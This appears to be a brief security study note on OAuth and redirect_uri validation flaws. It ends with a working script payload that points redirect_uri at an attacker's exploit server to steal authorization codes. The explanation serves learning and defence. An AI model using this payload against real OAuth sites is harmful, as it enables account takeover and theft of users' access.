OAuth

OAuth is a commonly used authorization framework that enables websites and web applications to request limited access to a user's account on another application. Crucially, OAuth allows the user to grant this access without exposing their login credentials to the requesting application. This means users can fine-tune which data they want to share rather than having to hand over full control of their account to a third party.

Redirect URI

The redirect_uri parameter is critical to the security of OAuth and OpenID Connect implementations, because it determines where sensitive data such as authorization codes are sent after the user authorizes the client. If the authorization server validates it too loosely, an attacker can have these codes delivered to a server they control, enabling account takeover.

Exploit example: the payload below redirects a user to the attacker's exploit server, so the authorization code is delivered there instead of to the legitimate client:

<script>
location="https://oauth-server.net/auth?client_id=e952oznwwqeok31q0uwpp&redirect_uri=https://you.exploit-server.net/exploit&response_type=code&scope=openid%20profile%20email"
</script>
